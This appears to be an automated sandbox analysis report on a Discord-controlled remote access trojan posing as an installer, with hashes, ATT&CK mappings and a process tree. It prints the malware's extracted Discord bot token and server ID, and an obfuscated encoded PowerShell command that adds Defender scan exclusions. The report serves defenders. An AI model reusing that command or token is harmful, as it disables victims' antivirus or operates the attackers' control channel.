discordrat | 15f679670aade72a91e3d0596b334441402453e29d4e4f0af509967799bc6ee2

General

Target

MinicoInstaller.exe
Size

7.6MB
MD5

efc16c463c8b66799da69dadbd7a8124
SHA1

500670a66e445c8d3a467e14efde7991824b9ff2
SHA256

15f679670aade72a91e3d0596b334441402453e29d4e4f0af509967799bc6ee2
SHA512

927eb8421f66a85b7bb8041c5a1bbf2973b96f958cfa59a5ecb89ecd528cc5d91468eef3983976611a28da860f92295066dc4e377f8851fa83daab5f543df6e5
SSDEEP

196608:+trnrL9SPYoGavO2KaH/K1QFcG1cpRHneRNB3SuN1G/s:+BnrL9SrGan5H/KEupxU3VN1

Score

10^/10

discordrat defense_evasion discovery persistence rat rootkit stealer upx

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTMzOTYyNDY0NTA5MDg3MzM5Ng.GSLke3.if1DF-bdxVyPF9XjyqM9CkH6lrVfd1LG6rrc0o
server_id
1339657624517349500

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Discordrat family
discordrat

Executes dropped EXE 3 IoCs

pid	Process
1188	MyRatBuilder(rename).exe
2508	MyGrabberBuilt(rename).exe
3020	MyGrabberBuilt(rename).exe

Loads dropped DLL 1 IoCs

pid	Process
3020	MyGrabberBuilt(rename).exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0005000000019794-36.dat	upx
behavioral1/memory/3020-38-0x000007FEF1FE0000-0x000007FEF26A4000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\MyRatBuilder(rename).exe	MinicoInstaller.exe
File created	C:\Windows\MyGrabberBuilt(rename).exe	MinicoInstaller.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MinicoInstaller.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2076	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2076	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1192 wrote to memory of 2076	1192	MinicoInstaller.exe	30
PID 1192 wrote to memory of 2076	1192	MinicoInstaller.exe	30
PID 1192 wrote to memory of 2076	1192	MinicoInstaller.exe	30
PID 1192 wrote to memory of 2076	1192	MinicoInstaller.exe	30
PID 1192 wrote to memory of 1188	1192	MinicoInstaller.exe	32
PID 1192 wrote to memory of 1188	1192	MinicoInstaller.exe	32
PID 1192 wrote to memory of 1188	1192	MinicoInstaller.exe	32
PID 1192 wrote to memory of 1188	1192	MinicoInstaller.exe	32
PID 1192 wrote to memory of 2508	1192	MinicoInstaller.exe	33
PID 1192 wrote to memory of 2508	1192	MinicoInstaller.exe	33
PID 1192 wrote to memory of 2508	1192	MinicoInstaller.exe	33
PID 1192 wrote to memory of 2508	1192	MinicoInstaller.exe	33
PID 2508 wrote to memory of 3020	2508	MyGrabberBuilt(rename).exe	34
PID 2508 wrote to memory of 3020	2508	MyGrabberBuilt(rename).exe	34
PID 2508 wrote to memory of 3020	2508	MyGrabberBuilt(rename).exe	34
PID 1188 wrote to memory of 2052	1188	MyRatBuilder(rename).exe	35
PID 1188 wrote to memory of 2052	1188	MyRatBuilder(rename).exe	35
PID 1188 wrote to memory of 2052	1188	MyRatBuilder(rename).exe	35

C:\Users\Admin\AppData\Local\Temp\MinicoInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\MinicoInstaller.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1192
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAZABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdwBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAYwBhACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2076
- C:\Windows\MyRatBuilder(rename).exe
  "C:\Windows\MyRatBuilder(rename).exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1188
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 1188 -s 596
    3⤵
    PID:2052
- C:\Windows\MyGrabberBuilt(rename).exe
  "C:\Windows\MyGrabberBuilt(rename).exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\MyGrabberBuilt(rename).exe
    "C:\Windows\MyGrabberBuilt(rename).exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI25082\python312.dll

Filesize
1.7MB

MD5
18677d48ba556e529b73d6e60afaf812

SHA1
68f93ed1e3425432ac639a8f0911c144f1d4c986

SHA256
8e2c03e1ee5068c16e61d3037a10371f2e9613221a165150008bef04474a8af8

SHA512
a843ab3a180684c4f5cae0240da19291e7ed9ae675c9356334386397561c527ab728d73767459350fa67624f389411d03665f69637c5f5c268011d1b103d0b02

Download Submit
C:\Windows\MyGrabberBuilt(rename).exe

Filesize
7.5MB

MD5
c38393d80a552d3c14d0103d84359321

SHA1
6a2515d36f3aede3fe43b6d8462187c65495b614

SHA256
bf803198af019c65692129a8f516cf280655ceb2aedcb6b4b959ea77800d0bd2

SHA512
e0ca229e8a3a1de7b260cb2b4000de3da0aa0cabb23de3c091e8e1aa87ba38af0d780fb108295793efe40686f581ec46e19067a43a8657071cd69a9557248343

Download Submit
C:\Windows\MyRatBuilder(rename).exe

Filesize
78KB

MD5
5d200c5467a787f5c231ee291169b6dc

SHA1
792ec91624ef031de6206a9da49fd060aea87bdf

SHA256
74adc7fb9835fcc0dc6fc18953dd35b88868a7cbe39f900f96ee69049b3258ef

SHA512
28f61d50edb5c6f7b9073059c7f14a176738018388a172766e88c4b06ea777e66111a0b4fbe5f67988769298ec48799e03d3528658113b65f4c1fb98a0aeaf7f

Download Submit
memory/1188-6-0x000007FEF5403000-0x000007FEF5404000-memory.dmp

Filesize
4KB

Download
memory/1188-28-0x000000013F910000-0x000000013F928000-memory.dmp

Filesize
96KB

Download
memory/3020-38-0x000007FEF1FE0000-0x000007FEF26A4000-memory.dmp

Filesize
6.8MB

Download

Analysis

Sharing